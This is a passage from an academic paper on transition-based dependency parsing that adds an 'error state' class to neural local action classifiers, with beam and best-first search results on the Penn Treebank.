dates once the desired structure is no longer in the beam (Collins and Roark, 2004). Transition-based dependency parsers based on the structured perceptron have reached high accuracy (Zhang and Nivre, 2011; Hatori et al., 2012), but these parsers remain in general less accurate than high-order graph-based parsers that model depen- dency graphs directly, instead of derivations (Zhang and McDonald, 2014; Martins et al., 2013). The drawback of these more accurate parsers is that they tend to be slower than transition-based parsers. 3 Parsing with Local Classifiers and Error States The standard way to train local classifiers to predict actions for transition-based parsers is to run the pars- ing algorithm using a gold-standard sequence of ac- tions (i.e. a sequence of actions that generates the gold-standard tree from a training set) and record the features corresponding to each parser state, where a parser state includes the parser’s stack, input buffer, and set of dependencies created so far. The features corresponding to a state are then associated with the gold-standard action that should be taken from that state, and this constitutes one training example for the local action classifier. Sagae and Tsujii (2007) propose using a maximum entropy classifier to pro- duce conditional probabilities for each action given the features of the state, and score each state using the product of the probabilities of all actions taken up to that state. However, they report that searching through the resulting space for the highest scoring parse does not consistently result in improved parser accuracy over a greedy policy (i.e. pursue only the highest scoring action at each state), suggesting that this strategy for scoring states is a poor choice. This is confirmed by Zhao et al. (2013), who report only a small improvement over greedy search despite using exact inference with this state scoring strategy. Because action probabilities are conditioned on the features of the current state alone and normalized locally, there is no reason to expect that the prod- uct of such probabilities along a derivation path up to a state, whether or not it is a final state, should reflect the overall quality of the state. Once an in- correct action is classified as more probable than the correct action in a given state Ti, the incorrect state Tj resulting from the application of the incorrect ac- tion will have higher score than the correct state Tk resulting from the application of the correct action. From that point, the action probabilities given state Tj will sum to one, just as the action probabilities given state Tk will sum to one, and there is no rea- son to expect that the most probable action from Tj should be less probable than the most probable ac- tion from Tk. In other words, once an error occurs, search is of little help in recovering from it, since scores are based only on local decisions and not on any notion of state quality, and the error occurred precisely because an incorrect action was found to be more probable locally. Our key contribution is a solution to this problem by introducing a notion of state quality in local ac- tion classification. This is done through the addi- tion of a new error class to the local classification model. Unlike the other classes, the error class does not correspond to a parser action. In fact, the error class is not used at all during parsing, and serves to occupy probability mass, keeping it from the actual parser actions. Intuitively, the probability of the er- ror class given the current state can be thought of as the probability that an error has occurred previ- ously and the resulting state belongs to an incorrect derivation path. 185 3.1 Training Local Classifiers with Error States To train a local classifier with error states, the stan- dard way of generating classifier training examples is modified to include parser states that do not be- long to the derivation of the gold-standard tree. It is these incorrect parser states that are labeled error states. Figure 1 illustrates the generation of train- ing examples for a local action classifier with error states, assuming unlabeled arc-standard dependency parsing (Nivre, 2008), where the actions are shift, reduce-right and reduce-left. From state 2, the stan- dard way of training local classifiers would be sim- ply to associate features from state 2 to a shift action, generate state 3 (only), associate features from state 3 with a shift action, generate state 6, and continue in this fashion along the derivation of the gold-standard tree. To add error states, from state 2 we do not only generate state 3, but also states 4 and 5, which result from the application of incorrect actions. In addition to associating features from state 3 with shift, we associate features from state 4 with the error class, and features from state 5 with the error class. The desired effect is that any time the parser deviates from a correct derivation, the error class should be- come probable, while valid parser actions become less probable. Although in principle any state out- side of a gold-standard derivation is an error state, we generate only error states resulting from the ap- plication of a single incorrect action, which in prac- tice increases the number of state-action pairs used to train the classifier by approximately a factor of three. We leave an investigation of how far into in- correct derivations one should go to generate addi- tional error states as future work. 3.2 Parsing with Error States Once a local classifier has been trained with error states, this classifier can be used in a transition- based parser with no modifications; the error class is simply thrown away during parsing. For example, the type of beam search typically used in transition- based parsing with the structured perceptron (Zhang and Clark, 2008; Huang and Sagae, 2010) can be used to pursue several derivations in parallel, and global score of a derivation can be decomposed as the sum of the scores of all actions in the deriva- 0 1 2 Sh Sh S=[] Q=[eat, pasta, with, sauce] S=[eat] Q=[pasta, with, sauce] S=[eat, pasta] Q=[with, sauce] R L Sh 4 3 5 S=[eat] Q=[with, sauce] S=[pasta] Q=[with, sauce] Err Err Sh R L 6 8 7 S=[eat, pasta, with] Q=[sauce] Figure 1: Training of a local classifier for parser actions with error states. In addition to collecting training exam- ples for each of the three valid parser actions (represented as Sh for shift, L for reduce-left, and R for reduce-right), we collect also examples of an error class (Err), which corresponds to the shaded states generated after taking an incorrect action. tion. Analogously, we score each derivation using the product of the probabilities for all actions in the derivation. Interestingly, local normalization of ac- tion scores allows the use of best-first search (Sagae and Tsujii, 2007), which has the potential to arrive at high quality solutions without having to explore as many states as a typical beam search, and even al- lows efficient exact or nearly exact inference (Zhao et al., 2013). Once actions are scored for the parser’s current state using a classifier, the score of a new state resulting from the application of a valid action to the current state can be computed as the product of the probabilities of all actions applied up to the new state in its derivation path. In other words, the score of each new state is the score of the current state multiplied by the probability of the action ap- plied to the current state to generate the new state. New scored states resulting from the application of each action to the current state are then placed in a priority queue. The highest scoring item in the pri- ority queue is chosen, and the state corresponding to that item is then made the current state1. The lo- cal classifier is then applied to the current state, and 1For efficiency, items inserted in the priority queue could be simply state scores coupled with the corresponding action and a pointer to the current state, since the new state only needs to be generated once it becomes the current state, and often only a fraction of priority queue items ever become current states. 186 0 1 2 4 3 Sh:1.0 Sh:0.3 P=1.0 S=[] Q=[eat, pasta, with, sauce] P=1.0 S=[eat] Q=[pasta, with, sauce] P=1.0 S=[eat, pasta] Q=[with, sauce] P=0.05 R:0.05 L:0.6 P=0.6 S=[eat] Q=[with, sauce] P=0.3 S=[eat, pasta, with] Q=[sauce] Sh:1.0 Sh:0.8 R:0.05 L:0.05 5 P=0.015 P=0.015 Sh:0.8 R:0.05 P=0.24 S=[eat, pasta, with, sauce] Q=[] …6 P=0.192 P=0.012 L:0.05 P=0.012 P=0.06 Sh: 0.1 Figure 2: Exploration of parser state space using best-first search and error states. States are numbered according to the order in which they become the parser’s current state. The local action classifier is trained with four classes: the three valid actions (represented as Sh for shift, L for reduce-left, and R for reduce-right) and an error class. The error class is not used by the parser and not shown in the diagram, but serves to reduce the total probability of valid parser actions by occupying some probability mass in each state, creating a way to reflect the overall quality of individual states. the process is repeated (without clearing the prior- ity queue, which already contains items correspond- ing to unexplored new states) until the current state is a final state (a state corresponding to a complete parse). This agenda-driven transition-based parsing approach, where the agenda is a priority queue, is optimal since all scores fall between 0 and 1, inclu- sive, but in practice a priority queue with limited ca- pacity can be used to improve efficiency by prevent- ing unbounded exploration of the exponential search space in cases where probabilities are nearly uni- form. Figure 2 illustrates arc-standard dependency parsing with error states and best-first search. From states 0 and 1, the only possible action is shift. From state 2, the most probably action according to the model is reduce-left, which is not the correct action, but has probability 0.6. The correct action, shift, has probability 0.3. State 3 is then chosen as the cur- rent state, but when the classifier is applied to state 3, the only valid action, shift, is assigned probabil- ity 0.1. This is because the classifier assigns most of the probability mass to the error class, which the parser does not use. Because the state resulting from a shift from state 3 would have low probability, due to the low probability of shift, the search continues from state 4, and the parser has recovered from the classification error at state 2. In the next section, we will present details of our neural network local classifiers. 4 Neural Models for Transition Based Parsing We implement transition-based parsers with error states following two search strategies: the step- wise beam search normally used in transition-based parsers with global models (Zhang and Clark, 2008; Huang and Sagae, 2010) and best-first search (Sagae and Tsujii, 2007; Zhao et al., 2013), described in the previous section. The trainable components of our transition-based parsers are the local classi- fiers that predict the next action given features de- rived from the current state. Following Chen and Manning (2014), we train feed-forward neural net- works (NNs) for local classification in our parsers. The NN is trained on pairs of features and actions, {fn,an}Nn=1, where fn is the feature vector extracted from the parser state and an is the corresponding correct action. For vanilla arc-standard parsing, an is one of {shift, reduce-left, reduce-right}, and for parsing with error states, an additional error action. 187 f1 f2 input features feature embeddings 64 dim hidden h1 hidden h2 50 dim action P(a | f) D ′ M Cf1 Cf2 D Figure 3: Basic architecture of our NN models While parsing, we extract feature vector f from the current state and make a decision based on the out- put distribution, P(a | f) computed by the NN. We will now describe the basic architecture of our NN classifier and the features that we use. We will also describe how we pre-train embeddings from unannotated data for our word features. 4.1 Neural Network Model Figure 3 shows the basic architecture of our neural network action prediction model for two input fea- tures f = f1,f2, each of which is a one-hot vector with dimension equal to the number of possible fea- ture types. The neural network has two hidden layers and the output softmax layer has the same number of units as the number of parser actions, that is, ei- ther 3 (without error states) or 4 (with error states). D is the input embedding matrix that is shared by all the input feature positions. Each feature posi- tion fi has a corresponding position matrix Cfi . The two hidden layers h1 and h2 comprise rectified lin- ear units (Nair and Hinton, 2010) having the activa- tion max(0,x) (Figure 4). x Figure 4: Activation function for a rectified linear unit. The neural network computes the probability dis- tribution over the parser actions, P(a | f), as fol- lows: The first hidden layer computes, h1 = φ   ∑ fi CfiDfi + b1   , where b1 is a vector of biases for h1 and φ is applied elementwise. The output of the second layer h2 is h2 = φ(Mh1 + b2) , where M is a weight matrix between h1 and h2 and b2 is a vector of biases for h2. The output softmax layer computes the probability of an action as: P(a | f) = exp ( vaD ′h2 + b T va ) ∑ a′ exp (va′D ′h2 + bT va′) , where D′ is the matrix of output action embeddings, b is a vector of action biases, and va is the one hot representation of the action a. We learn models that predict over two types of output distributions con- ditioned on f: vanilla arc-standard models that pre- dict over shift, reduce-left and reduce-right, and arc- standard models with error states (Section 3) that predict over shift, reduce-left, reduce-right and er- ror. 4.2 Semi-supervised Learning: Pre-training Word Embeddings It is often the case that large amounts of domain- specific unannotated data, i.e. raw text, is avail- able in addition to annotated data. For both graph- based and transition-based parsing, many feature templates are defined on words from the input sen- tence. Previous work has shown benefits of using word representations learned from unannotated data. Koo et al. (2008) achieve significant improvement in dependency parsing on the Penn Treebank (PTB) (From 92.02% to 93.16%) by using Brown clus- ters (Brown et al., 1992) learned from the BLLIP corpus (Charniak et al., 2000). Chen and Manning (2014) also show 0.7% improvement on English de- pendency parsing on PTB using pre-trained English word embeddings from Collobert et al. (2011). We also seek to benefit from pre-trained embeddings 188 to initialize the input feature embeddings, D (Fig- ure 3), in our neural network classifiers. Following both Koo et al. (2008) and Chen and Manning (2014), we learn word embeddings by training a feed-forward neural network language model on a concatenation of the BLLIP corpus and sections 02–21 of the PTB corpus. We use the NPLM toolkit (http://nlg.isi.edu/software/nplm/), which implements noise contrastive estimation training of a two-hidden layer feed-forward neu- ral network language model with rectifier linear units (Vaswani et al., 2013). We train a 7-gram neu- ral language model with input word embedding di- mension 64, 512 units in the first hidden layer, 512 units in the second hidden layer and output word- embedding dimension of 512. The neural language model is trained for 30 epochs using stochastic gra- dient descent and an initial learning rate of 1.0. We restrict the vocabulary to about 100k most-frequent words, replacing all the other words with <unk>. We use a validation set of about 250k n-grams and extract the input word embeddings from the epoch that achieves the lowest perplexity on the validation set. To avoid over-fitting, in our dependency parsing experiments, we only use pre-trained embeddings for the words that occurred at least twice in sections 02–21 of the PTB corpus. Pre-trained embeddings give us significant improvements over randomly ini- tialized embeddings, as our results will show (sec- tion 5). 4.3 Training We train six different types of NN classifiers for transition-based dependency parsing: one for each search algorithm with error states, with and with- out pre-trained word embeddings, in addition to two models with no error states, as described below. 4.3.1 Vanilla Arc-standard Parsers We train NN classifiers for arc-standard transition- based parsers that compute probability distributions over shift, reduce-left, and reduce-right, using the 14 kernel features described by Huang and Sagae (2010), shown in Table 1. We trained models us- ing both pre-trained (Section 4.2) and randomly ini- tialized word embeddings. We denote these parsers as Local–14–pre and Local–14–rand. These mod- els allow us to compare the use of NN classification Word features s0.w s1.w s2.w q0.w q1.w POS tag features s0.t s1.t s2.t q0.t q1.t Child features s0.lc.t s0.rc.t s1.lc.t s1.rc.t Table 1: The 14 feature templates used in some of our models. s and q indicate the stack and the input buffer respectively, subscripts start at zero on the top of the stack or in the front of the input buffer. Fi- nally, lc and rc indicate the leftmost left child and the rightmost right child, respectively. without error states directly with the structured per- ceptron, and examine the impact of pre-trained word embeddings. 4.3.2 Error State Parsers We also train NN classifiers that differ from the ones above only in the use of error states: ErrSt–14–pre (error states, pre-trained embeddings), and ErrSt– 14–rand (error states, randomly initialized embed- dings). These allow us to examine the impact of using error states, and give us a way to compare our approach with NN and error states directly with an existing structured perceptron arc-standard parser (Huang and Sagae, 2010) using the same 14 kernel features and the same search approach. The dif- ferences in the two approaches are that Huang and Sagae (2010) use the structured perceptron and an extended set of features based on the kernel features, and we use NN with error states and only the 14 ker- nel features. Additionally, we train two classifiers that use a more expressive expanded set of 25 features, which we use with best-first search (Sagae and Tsujii, 2007; Zhao et al., 2013) with error states: ErrSt–25–pre (expanded feature set, error states, pre-trained embeddings), and ErrSt–25–rand (ex- panded feature set, error states, randomly initial- ized embeddings). The 25 feature templates used by these classifiers are shown in Table 2. In con- trast, Chen and Manning (2014) use 48 feature tem- plates, including higher-order dependency informa- tion than has been shown to improve parsing ac- curacy significantly (Zhang and Nivre, 2011). It is likely that our approach would benefit similarly from the use of these features, but we leave the ad- dition of features as future work. Finally, for each of six types of classifiers above, 189 Word s0.w s1.w s2.w q0.w q1.w q2.w q3.w POS tag features s0.t s1.t s2.t q0.t q1.t q2.t q3.t Word child features s0.lc.w s0.rc.w s1.lc.w s1.rc.w POS child features s0.lc.t s0.rc.t s1.lc.t s1.rc.t Previous action previous action Distance dist(s0,s1) dist(q0,s0) Table 2: The expanded set of 25 feature templates used in some of our models. s and q indicate the stack and the input buffer respectively, subscripts start at zero on the top of the stack or in the front of the input buffer. lc and rc indicate the leftmost left child and the rightmost right child, respectively. dist(a,b) is the signed distance between the root of a and the root of b in the input sentence, and previous action is the action that was applied to generate the current state. we train models using both Stanford dependen- cies (de Marneffe and Manning, 2008) and Ya- mada and Matsumoto (YM) dependencies (Yamada and Matsumoto, 2003) extracted from the Penn Treebank. We create {fntrain,antrain} Ntrain n=1 pairs on Wall Street Journal sections 02–21, and use {fndev,andev} Ndev n=1 pairs from section 22 as a develop- ment set, where Ntrain and Ndev are the number of training and dev instances. We obtain part-of-speech tags by training a CRF tagger on sections 02–21 with 4-way jackknifing, which achieves a tagging accu- racy of 97.2% on section 23. We train our NN clas- sifiers to maximize the log-likelihood of the correct actions given features, 1 n Ntrain∑ n=1 log P(antrain | fntrain). We use mini-batch dropout training, computing gra- dients using the back-propagation algorithm (Hinton et al., 2012). We use the development set to tune the learning rate, halving it if the perplexity on the de- velopment set increases. 4.4 Model and Parser Selection For each of our NN classifiers, there are a few tun- able hyper-parameters: hidden layer size (h1), mini- batch size, initial learning rate lr, dropout probabil- ities for h1 and h2 (dh1 , and dh2 ) , and random ini- tialization of parameters. We tuned each of these to maximize classification accuracy of the most likely action predicted by the classifier given the feature vector. We calculated classification accuracy as ∑Ndev n=1 δ(arg maxa P(a | fndev),andev) Ndev , where δ(x,y) returns 1 if x equals y and 0 otherwise. For each of the classifiers, we first tuned lr, mini-batch size, h1 size, and dh1 and dh2 for accuracy. We tried lr = {1.0,0.5,0.25}, h1 = {512,1024,1536,2048}, mini-batch size = {128,256,512}, dh1 = {0.0,0.1,0.2}, and dh2 = {0.0,0.1,0.2}. For all our randomly initialized classifiers (Local–14–rand, ErrSt–14–rand, and ErrSt–25–rand), we chose the model that achieved the best classification accuracy on the development set for parsing the test set. We also used the same random seed to initialize our parameters. For Local–14–pre, ErrSt–14–pre, and ErrSt–25–pre, we trained models with different random initializa- tions of the input embeddings (D in figure 3) that were not pre-trained. For each random initializa- tion, we chose the model with the best classifica- tion accuracy on the development set. To pick the fi- nal model for parsing on test, we selected the model to maximize parsing accuracy on the development set. We computed our parsing accuracies using the eval07.pl script from the CoNLL 2007 shared task on dependency parsing (Nivre et al., 2007), ignoring punctuation as is standard in English dependency parsing evaluation. For both YM and Stanford dependencies, the optimal values of h1 were 1536 for ErrSt–25– pre and ErrSt–25–rand, and either 1536, or 2048 for Local–14–pre, Local–14–rand, ErrSt–14–pre, and ErrSt–14–rand. For the best parser on Stanford and YM dependencies, (ErrSt–25–pre), we used a minibatch size of 256 and a initial learning rate of 0.25. For future work, we will explore a larger grid of learning rate, minibatch sizes, and dropout values. At parsing time, we pre-multiply the input em- beddings, D and the position matrices, Cfi , which speeds up computation significantly. 5 Results In all experiments we use dependencies extracted from the Penn Treebank (Marcus et al., 1993) fol- lowing the standard splits (WSJ sections 02 to 21 190 System UAS Local–14–pre (beam 1) 91.73 Local–14–pre (beam 4) 92.00 (+0.27) ErrSt–14–pre (beam 1) 91.77 ErrSt–14–pre (beam 4) 92.61 (+0.84) ErrSt–25–pre 93.22 Table 3: Unlabeled accuracy scores (UAS) on the development set with Stanford dependencies using transition-based models trained with pre-trained em- beddings. ErrSt–25–pre uses best-first search with a priority queue of size limited to 100. System UAS Local–14–rand (beam 1) 90.96 Local–14–rand (beam 4) 91.21 (+0.25) ErrSt–14–rand (beam 1) 90.83 ErrSt–14–rand (beam 4) 91.98 (+1.15) ErrSt–25–rand 92.29 Table 4: Unlabeled accuracy scores (UAS) on the development set with Stanford dependencies us- ing models trained without pre-trained embeddings. ErrSt–25–pre uses best-first search with a priority queue of size limited to 100. for training, 22 for development and 23 for testing), and part-of-speech tags assigned automatically us- ing four-way jackknifing. Tables 3 and 4 present results obtained on the development set with our models trained with and without pre-trained word embeddings. Our baseline arc-standard parser us- ing greedy search (Local–14–pre beam 1) is as ac- curate as the best NN dependency parser of Chen and Manning (2014), where both use pre-trained embeddings. In both tables, we can see that in- creasing the beam size from 1 (greedy parsing) to 4 gives only very modest improvements in accu- racy when trained without error states (Local–14– pre and Local–14–rand). As mentioned in sec- tion 2.2, using beam search with vanilla arc-standard parsing with locally normalized models does not produce large improvements over greedy search due to the label bias problem. For both pre-trained and randomly initialized word embeddings, beam search with models trained with error states improves ac- curacy substantially (ErrSt–14–pre and ErrSt–14– �� Figure 5: Effect of beam size on accuracy, using Stanford dependencies and models trained with pre-trained embed- dings. �� Figure 6: Effect of beam size on accuracy, using Stanford dependencies and models trained without pre-trained em- beddings. rand). Our best parsers use pre-trained embeddings, best-first search, and a larger feature set (ErrSt–25– pre). In Table 4, we isolate the efficacy of training and search with error states. Even with randomly initialized embeddings, we are able to outperform Chen and Manning’s NN dependency parser initial- ized with embeddings from external sources. Our results show that using error states in parsing can improve parsing accuracy independently of whether beam search or best-first search is used. Figures 5 and 6 show comparisons of the effects of increasing beam sizes in models trained with and without error states. We additionally show that the benefits of using 191 �� Figure 7: Unlabeled accuracy scores (UAS) obtained us- ing maximum entropy models for local classification of parser actions with and without error states using various beam sizes. error states are not limited to classification with neural networks. Figure 7 shows the results ob- tained on the development set with an arc-standard beam-search parser using maximum entropy clas- sification2 with L1 regularization and the full set of features used by Huang and Sagae (2010), and increasing beam sizes. The improvement obtained from beam-search with baseline local classification is limited as expected, while the improvement ob- tained from beam-search with error states is sub- stantially more pronounced. Although the accuracy levels obtained with maximum entropy classification are clearly lower than those obtained with our neural network models, these results do confirm that error states are effective with linear classification. In Table 5, we compare our best parsers with and without pre-trained word embeddings, ErrSt–25– pre and ErrSt–25–rand, against other published re- sults. On Stanford dependencies, our parser with pre-trained embeddings performs comparably with the state-of-the-art. By using search with error states, we outperform a greedy NN parser (Chen and Manning, 2014) by a wide margin. On YM depen- dencies, our performance (ErrSt–25–pre) is com- parable to that of a structured perceptron second- order graph-based parser using carefully selected features based on Brown clustering of the BLLIP 2We used Yoshimasa Tsuruoka’s maximum entropy library, downloaded from http://www.logos.ic.i.u-tokyo. ac.jp/˜tsuruoka/maxent/. System wsj23-S wsj23-YM ErrSt–25–rand 92.17 92.16 ErrSt–25–pre∗ 93.61 93.21 Chen & Manning∗ 91.8 – Huang & Sagae – 92.1 Zhang & Nivre 93.5 92.9 Weiss et al.∗ 93.99 – Zhang & McDonald 93.71 93.57 Martins et al. 92.82 93.07 Koo et al. (dep2c)∗ – 93.16 Table 5: Unlabeled accuracy scores (UAS) on Stan- ford dependencies (S) and Yamada & Matsumoto dependencies (YM) extracted from WSJ section 23 for our best transition-based parsers with error states, with and without pre-trained word embed- dings. For comparison, we also include results from other transition-based approaches (Chen and Man- ning, 2014; Huang and Sagae, 2010; Zhang and Nivre, 2011; Weiss et al., 2015) and graph-based approaches (Zhang and McDonald, 2014; Martins et al., 2013; Koo et al., 2008). ∗These parsers use large sets of unlabeled data. corpus (Koo et al., 2008). Our randomly initial- ized parser (no pre-trained embeddings), ErrSt–25– rand performs at a similar level to a structured per- ceptron transition-based parser (Huang and Sagae, 2010), but below that of parsers with finely tuned higher-order rich feature sets (Zhang and Nivre, 2011). While we leave the use of Zhang and Nivre’s rich feature set as future work, for a direct compar- ison of NN models with error states and structured perceptron for transition-based dependency parsing, we additionally tested a parser (ErrSt–14–rand) that uses the exact same beam search and kernel fea- tures used by Huang and Sagae (2010). With NN and error states, we obtained 91.84% accuracy, com- pared to Huang and Sagae’s 92.1%. An advantage of our approach is that we use the kernel features only, which come from the 14 templates shown in Table 1, while Huang and Sagae use additionally an extended set of features composed of carefully tuned concatenation templates involving the kernel features. The parsing speed of our parser imple- mentation using our best model, ErrSt–25–pre, is 192 approximately 1,000 tokens (or 42 sentences) a sec- ond. Of course, such a measurement of speed is de- pendent on a variety of factors, such as hardware and programming language of the specific implementa- tion, among others, so this figure observed in our experiments serves only as an illustrative sample. 6 Related Work Our work builds on the transition-based parsing work described in Section 2, where local classifiers are trained to predict parser actions (Nivre, 2008), but provides a way to go beyond deterministic pars- ing. One way to create models capable of global scoring, and therefore effective search, is to parse with the structured perceptron (Zhang and Clark, 2008), which we also discuss in Section 2. Instead of performing global weight updates, our approach re- lies on local classifiers, but adds information about incorrect derivation paths to approximate a notion of global loss. This gives us a simple way to train neural network models for predicting parser actions locally but still perform effective search. Our use of error states is conceptually related to the correctness probability estimate proposed by Yazdani and Henderson (2015), which is used only with each shift action of an arc-eager transition- based parsing model. This correctness probability creates a measure of quality of derivations at the point of each shift, which allows a combination of local action scores and the correctness probability to be used with beam search. The beam is then de- termined only at each shift, while search paths pro- duced by other actions are extended exhaustively. Our error states, in contrast, adjust the scores of ev- ery action, making the use of best-first search natu- ral. Non-deterministic oracles for transition-based de- pendency parsing (Goldberg and Nivre, 2012; Gold- berg and Nivre, 2013) are also designed to improve the performance of parsers that use local classifica- tion of actions by adding to the amount of infor- mation used to train the local classifiers. However, non-deterministic oracles aim to allow a determin- istic parser to recover from incorrect actions by in- cluding information in the training of the local clas- sifiers based on the notion that there may be several correct actions at a given point, as long as a desired tree remains reachable. In contrast, our local classi- fier, or oracle, is trained to encode a notion of state quality or approximate global loss that is specifi- cally designed for search. In fact, when used with greedy search, our error states have no positive ef- fect on parsing. This suggests that a combination of the benefits of non-deterministic oracles and error states may be possible. Our training of local classifiers with error states shares with SEARN (Daumé III et al., 2009) and DAGGER (Ross et al., 2010) the idea of creating a notion of global loss in local scores, but SEARN and DAGGER learn to estimate the quality of search states by iteratively training policies using the entire training set, while we train only one policy, but us- ing explicit information about states outside of the optimal path. Choi and Palmer (2011) show that the idea of iter- atively refining policies in a very similar way as pro- posed in SEARN and DAGGER can in fact be applied to transition-based dependency parsing to improve accuracy of deterministic parsing. By creating train- ing examples for local classifiers based on parser states that are likely to occur at run time, but would not be generated with the gold-standard derivation, local classification models can be trained to be more robust in recovery from past errors. A key difference is that this provides a way for the parser to do better assuming that a mistake has already been made and is irrevocable, while our error states are designed to improve search, lowering the score of undesirable paths so a different path is chosen. Our greedy neural network parser is similar to Chen and Manning (2014), who are the first to show the benefits of using feed-forward neural net- work classifiers in greedy transition-based depen- dency parsing. Unlike us, they use a single hidden layer of cube activation functions, and more fea- tures. We follow the neural network architecture of Vaswani et al. (2013), using two hidden layers of rectified linear units. Chen and Manning (2014) use Adagrad (Duchi et al., 2011) and dropout for optimization, while we use stochastic gradient de- scent with dropout. Recent work by Weiss et al. (2015) produces the highest published accuracy for English dependency parsing with very similar neu- ral network architectures and similar pre-training of word embeddings. The accuracy of the greedy ver- 193 sion of their parser is substantially higher than that of our greedy parser, due at least in part to the use of more features. A more interesting difference be- tween their approach and ours is in the way struc- tured prediction is performed. While Weiss et al. add a structured perceptron layer to a network pre- trained locally, we train only locally, but using error states. Both approaches are effective in producing improvements over the respective greedy baselines, and a direct comparison using the same greedy base- line is left for future work. 7 Conclusion We presented a new approach for approximate struc- tured inference for transition-based parsing that al- lows us to obtain high parsing accuracy using neural networks. Using error states, we improved search by producing scores suitable for global scoring us- ing only local models, and showed that our ap- proach is competitive with the structured percep- tron in transition-based parsing. Additionally, our approach provides a straightforward way to take advantage of word embeddings in transition-based parsing, which produce high accuracy for transition- based dependency parsing in English, rivaling that of higher-order graph-based parsers. Source code, models and word embeddings for our transition- based dependency parser with error states are avail- able at http://github.com/sagae/nndep. Our approach for using error states to improve search is quite general, and could be applied to other structured problems that can be approximated us- ing local models, such as sequence labeling and transition-based parsing with recurrent neural net- works. An area of future work is the application of error state training in problems where the local classifier has a high number of classes, as is often the case in labeled dependency parsing. A straightforward application of our approach roughly multiplies the number of training examples for the local classifier by the number of possible classes. For example, in labeled dependency parsing, where dependency la- bels are typically concatenated to actions, the num- ber of classes is often greater than 30, which would increase the number of training examples more than 30-fold. Preventing such an increase in the number of training examples may be possible by factoring the problem in such a way that structure-building decisions are treated separately from labeling de- cisions (in labeled dependency parsing this would amount to training an arc labeling classifier sepa- rately), or perhaps more generally, by sampling from the possible error states. Acknowledgments We thank the anonymous reviewers for their numer- ous insightful suggestions. The work described here has been sponsored by the U.S. Army under con- tract number W911NF-14-D-0005 and ARO grant W911NF-10-1-0533. Any opinions, content or in- formation presented does not necessarily reflect the position or the policy of the United States Gov- ernment, and no official endorsement should be in- ferred. References Peter F. Brown, Peter V. Desouza, Robert L. Mercer, Vin- cent J. Della Pietra, and Jenifer C. Lai. 1992. Class- based n-gram models of natural language. Computa- tional Linguistics, 18(4):467–479. Eugene Charniak, Don Blaheta, Niyu Ge, Keith Hall, John Hale, and Mark Johnson. 2000. BLLIP 1987-89 WSJ corpus release 1. Linguistic Data Consortium, Philadelphia, 36. Danqi Chen and Christopher D. Manning. 2014. A fast and accurate dependency parser using neural net- works. In Proceedings of Empirical Methods in Natu- ral Language Processing., pages 740–750. Jinho D. Choi and Martha Palmer. 2011. Getting the most out of transition-based dependency parsing. In Proceedings of the Association for Computational Lin- guistics., HLT ’11, pages 687–692, Stroudsburg, PA, USA. Proceeding of the Association for Computa- tional Linguistics. Michael Collins and Brian Roark. 2004. Incremental parsing with the perceptron algorithm. In Proceed- ings of the Association for Computational Linguis- tics., ACL ’04, Stroudsburg, PA, USA. Association for Computational Linguistics. Michael Collins. 2002. Discriminative training meth- ods for Hidden Markov Models: Theory and experi- ments with perceptron algorithms. In Proceedings of the Empirical Methods in Natural Language Process- ing, EMNLP ’02, pages 1–8, Stroudsburg, PA, USA. Association for Computational Linguistics. 194 Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel Kuksa. 2011. Natural language processing (almost) from scratch. The Journal of Machine Learning Research, 12:2493– 2537. Hal Daumé III, John Langford, and Daniel Marcu. 2009. Search-based structured prediction. Journal of Ma- chine Learning Research., 75(3):297–325, June. Marie-Catherine de Marneffe and Christopher D. Man- ning. 2008. The Stanford typed dependencies repre- sentation. In Coling 2008: Proceedings of the work- shop on Cross-Framework and Cross-Domain Parser Evaluation, pages 1–8, Manchester, UK, August. Col- ing 2008 Organizing Committee. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. The Journal of Machine Learning Research, 12:2121–2159. Yoav Goldberg and Joakim Nivre. 2012. A dynamic ora- cle for arc-eager dependency parsing. In Proceedings of the International Conference on Computational Lin- guistics., pages 959–976. The COLING 2012 Organiz- ing Committee. Yoav Goldberg and Joakim Nivre. 2013. Training deterministic parsers with non-deterministic oracles. Transactions of the Association of Computational Lin- guistics, pages 403–414. Jun Hatori, Takuya Matsuzaki, Yusuke Miyao, and Jun’ichi Tsujii. 2012. Incremental joint approach to word segmentation, POS tagging, and dependency parsing in Chinese. In Proceedings of the Association for Computational Linguistics, ACL ’12, pages 1045– 1053, Stroudsburg, PA, USA. Association for Compu- tational Linguistics. Geoffrey E. Hinton, Nitish Srivastava, Alex Krizhevsky, Ilya Sutskever, and Ruslan R. Salakhutdinov. 2012. Improving neural networks by preventing co-adaptation of feature detectors. arXiv preprint arXiv:1207.0580. Matthew Honnibal, Yoav Goldberg, and Mark Johnson. 2013. A non-monotonic arc-eager transition system for dependency parsing. In Proceedings of the Sev- enteenth Conference on Computational Natural Lan- guage Learning, pages 163–172. Proceedings of the Association for Computational Linguistics. Liang Huang and Kenji Sagae. 2010. Dynamic program- ming for linear-time incremental parsing. In Proceed- ings of the Association for Computational Linguistics., ACL ’10, pages 1077–1086, Stroudsburg, PA, USA. Association for Computational Linguistics. Liang Huang, Suphan Fayong, and Yang Guo. 2012. Structured perceptron with inexact search. In Proceed- ings of the Conference of the North American Chap- ter of the Association for Computational Linguistics., NAACL HLT ’12, pages 142–151, Stroudsburg, PA, USA. Association for Computational Linguistics. Richard Johansson and Pierre Nugues. 2006. Investi- gating multilingual dependency parsing. In Proceed- ings of the Tenth Conference on Computational Nat- ural Language Learning, CoNLL-X ’06, pages 206– 210, Stroudsburg, PA, USA. Association for Compu- tational Linguistics. Terry Koo, Xavier Carreras, and Michael Collins. 2008. Simple semi-supervised dependency parsing. In Pro- ceedings of the Association for Computational Lin- guistics, pages 595–603. Association for Computa- tional Linguistics. John D. Lafferty, Andrew McCallum, and Fernando C. N. Pereira. 2001. Conditional Random Fields: Proba- bilistic models for segmenting and labeling sequence data. In Proceedings of the International Conference on Machine Learning, ICML ’01, pages 282–289, San Francisco, CA, USA. Morgan Kaufmann Publishers Inc. Mitchell P. Marcus, Mary Ann Marcinkiewicz, and Beat- rice Santorini. 1993. Building a large annotated cor- pus of English: The Penn Treebank. Computational Linguistics., 19(2):313–330, June. André F. T. Martins, Miguel Almeida, and Noah A. Smith. 2013. Turning on the turbo: Fast third-order non-projective turbo parsers. In Proceeding of the As- sociation for Computational Linguistics., pages 617– 622. Andrew McCallum, Dayne Freitag, and Fernando Pereira. 2000. Maximum Entropy Markov Models for information extraction and segmentation. In Pro- ceedings of the International Conference in Machine Learning., volume 17, pages 591–598. Vinod Nair and Geoffrey E. Hinton. 